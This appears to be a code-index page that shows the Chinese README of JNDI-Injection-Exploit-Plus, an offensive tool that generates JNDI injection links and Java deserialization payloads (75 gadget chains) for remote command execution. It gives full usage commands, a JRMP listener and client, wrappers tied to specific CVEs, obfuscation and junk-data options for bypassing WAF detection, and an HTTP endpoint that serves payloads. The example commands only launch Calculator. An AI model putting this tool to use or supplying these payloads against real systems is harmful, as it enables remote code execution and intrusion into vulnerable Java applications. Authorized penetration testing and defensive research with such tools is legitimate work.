MCPcopy Index your code
hub / github.com/cckuailong/JNDI-Injection-Exploit-Plus

github.com/cckuailong/JNDI-Injection-Exploit-Plus @2.5

Chat with this repo
repository ↗ · DeepWiki ↗ · release 2.5 ↗ · + Follow
645 symbols 2,052 edges 122 files 44 documented · 7%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

JNDI-Injection-Exploit-Plus

English README

JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目。

详细说明

是一款JNDI注入利用工具,可以生成JNDI链接并启动后端相关服务。

根据JNDI的三种触发点,提供3种JNDI利用方式

  • 远程Reference链 (3种)
  • 本地Reference链 (4种)
  • 反序列化链(75种)

P.S. 具体利用链名称及依赖见 表格

使用方法

$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address]

参数说明

-C - 要执行的命令.

(可选 , 默认命令 "open /Applications/Calculator.app")

-A - 运行此工具的主机IP地址.

(可选 , 默认是第一个网卡的地址)

示例

  1. 运行工具
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. 触发JNDI注入
class Test{
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
    }
}

是一款反序列化Payload生成工具

包含50+ Gadgets链,比ysoserial还多出10+,后续会持续补充,欢迎大家一起来提交。

使用方法

$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]

参数说明

-C - 要执行的命令.

(可选 , 默认命令 "open /Applications/Calculator.app")

-D - 要生成的反序列化链名字,见Github列表.

-O - (可选) 输出格式,base64或16进制, 默认是16进制

示例

  1. 普通
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64

  1. JRMP

  2. JRMPListener

java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
  • JRMPClient
java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64

提供反序列化包装器

包装器 示例漏洞
Xstream CVE-2021-39149
Apereo Apereo 4.1 反序列化漏洞
JbossRemoting Jboss Remoting 服务反序列化
Gzip 用友组件的一些接口使用Gzip
Dirty 插入大量脏数据来绕过WAF检测
  • 示例
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream

混淆

混淆class名字来绕过WAF

  • Example
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F

参考链接:https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html

可以返回反序列化数据的web服务

java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar
POST /deserial/{Gadget}

cmd={command}&wrapper={wrapper}output={base64/hex}

P.S. 参数 wrapper & output 是可选的

总结

JNDI-Injection-Exploit-Plus 主要有JNDI注入和生成反序列化链 2个用途,其中包含的利用链更多。详情请移步项目地址:https://github.com/cckuailong/JNDI-Injection-Exploit-Plus

喜欢的同学别忘了点个star。 ^_^

参考链接

  • https://github.com/cckuailong/JNDI-Injection-Exploit-Plus
  • https://github.com/welk1n/JNDI-Injection-Exploit
  • https://github.com/frohoff/ysoserial

Extension points exported contracts — how you extend this code

ObjectPayload (Interface)
(no doc) [75 implementers]
src/main/java/payloads/ObjectPayload.java
ObjectWrapper (Interface)
(no doc) [5 implementers]
src/main/java/wrappers/ObjectWrapper.java
BytesWrap (Interface)
(no doc) [5 implementers]
src/main/java/wrappers/BytesWrap.java
ReleaseableObjectPayload (Interface)
@author mbechler [2 implementers]
src/main/java/payloads/ReleaseableObjectPayload.java

Core symbols most depended-on inside this repo

withColor
called by 172
src/main/java/run/ServerStart.java
setFieldValue
called by 91
src/main/java/util/Reflections.java
run
called by 67
src/main/java/util/PayloadRunner.java
add
called by 58
src/main/java/weblogic/security/utils/SSLSetup.java
setAccessible
called by 58
src/main/java/util/Reflections.java
newInstance
called by 51
src/main/java/util/Reflections.java
getLocalTime
called by 37
src/main/java/run/ServerStart.java
getSecurityManager
called by 30
src/main/java/secmgr/DelegateSecurityManager.java

Shape

Method 502
Class 139
Interface 4

Languages

Java100%

Modules by API surface

src/main/java/weblogic/jms/common/StreamMessageImpl.java49 symbols
src/main/java/weblogic/security/utils/SSLSetup.java35 symbols
src/main/java/secmgr/DelegateSecurityManager.java30 symbols
src/main/java/common/secmgr/DelegateSecurityManager.java30 symbols
src/main/java/jndi/RMIRefServer.java17 symbols
src/main/java/jetty/JettyServer.java13 symbols
src/main/java/weblogic/security/utils/SSLTrustValidator.java12 symbols
src/main/java/secmgr/ExecCheckingSecurityManager.java12 symbols
src/main/java/payloads/C3P0Tomcat.java12 symbols
src/main/java/payloads/C3P0.java12 symbols
src/main/java/common/secmgr/ExecCheckingSecurityManager.java12 symbols
src/main/java/exploit/JRMPListener.java11 symbols

For agents

$ claude mcp add JNDI-Injection-Exploit-Plus \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact